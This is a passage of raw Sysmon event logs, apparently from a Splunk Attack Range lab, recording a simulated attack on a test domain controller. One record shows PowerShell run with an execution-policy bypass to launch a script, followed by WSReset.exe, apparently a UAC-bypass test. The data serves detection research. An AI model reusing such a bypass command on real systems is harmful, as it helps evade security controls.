indows\System32\shell32.dll+1223c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+38b30c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+af11c7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64) 154100x80000000000000001051105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.664{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe10.0.14393.4169 (rs1_release.210107-1130)This tool resets the Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\System32\WSReset.exe" C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=5181342124A0AB97F865A39581CE9C41,SHA256=FE7AF6AC7EA79AEA47BFF06035875DD1975590F78C31797526908C1A4877EE84,IMPHASH=279E04CF32068F56394D78D663C285A4{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\ws.ps1'" 23542300x80000000000000001051165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.983{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31CB2560A466552FACCBA041DE21D0E2,SHA256=C6DA2431FFE6D657268C42820717E7C2588E33A0434F0BB32E5936EC632FAD7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:32.619{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BBF615077A65F96102435B98DFEE447,SHA256=6F8ADF34D8E4B10A31E935BA70FB7D22ADDBA4980473F3C3C4CCE40B3A2BD5CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.820{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9C9B91DD607933377C2B0241470B94CF,SHA256=B6F690379A4CBB480F9985646E92C4D1415DCC951EFD414462B13503D08DF50C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.819{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B5E72A778217DAF240E862475033D9B1,SHA256=C7702984BB53EE8A203D308F9D19DEC496641AC4FE2DDA79A838488141B64938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.684{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8BFF5AA4C89B9CDC54D2BAF29392A09,SHA256=6682B720B2E235571AD8C63B2335F162A6AF0522637799BE37EA435035145359,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A2110BC4AAA52E683BC2D77EA274854,SHA256=94DB570939ED85B1C85E798E805A2E6DF4399B486C074FA26B998F49B988CED9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CAAD54FE055C0A7A7BFF5529387AB2C9,SHA256=DF5613C2E05DC2AA5594584A98D65BA92F8A2E5DA01F77B215F65A24F375F7E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.382{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.381{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.381{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.379{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\Windows.UI.Immersive.dll+1d16|C:\Windows\System32\Windows.UI.Immersive.dll+2362|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.379{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.UI.Immersive.dll+2f6d|C:\Windows\System32\Windows.UI.Immersive.dll+2213|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001051154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.377{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.376{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.376{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.374{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.374{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.374{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.374{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.365{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.364{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.363{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.361{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.361{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.142{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.131{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.131{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:33.999{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B23E5395F928BE7341ED1F47B8FEB310,SHA256=DEE7D5A086129136D568549C7233CE753E3DBE1316F66969D36BD302CC13D4AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:33.650{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3457F76F10ABB0C35FD8EA0ADD9E3E5,SHA256=16E11E551624C36A0E8D1B659EE8BAAF6A020649E943471A02A430422CC18E47,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:31.251{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57333-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:34.680{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18761AD1C6CD8E6AA00C35BC5DB0E892,SHA256=96BC0D19F542F9076ADCD2A0A7C88A443241368F1A473DEA1293E52F3C1A1F6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:35.727{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6B34E5F79102B25D1690B193B4C6BEB,SHA256=4AAAF2738E72DA4C2660F4D9B1C8D719583C684B43698139A20376C30A8AE9F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51100-false10.0.1.12-8000- 23542300x80000000000000001051167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:35.018{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B0238BD0E8981045E65F24DA12FFA85,SHA256=613B497DFCF3AD3DE980603628BDCBD53167641BD77AF2862FEAC673F99634D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:33.845{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse65.49.20.68scan-19.shadowserver.org53998-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:36.758{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32AC9F2D434A0051F2101E4207A25B36,SHA256=67541BEDE47D9ADE58DA82DC0FCF0478DB590246066DB408CDD08AB4CC474E0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.725{466BC892-F5E6-60EB-817D-00000000CF01}8472ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 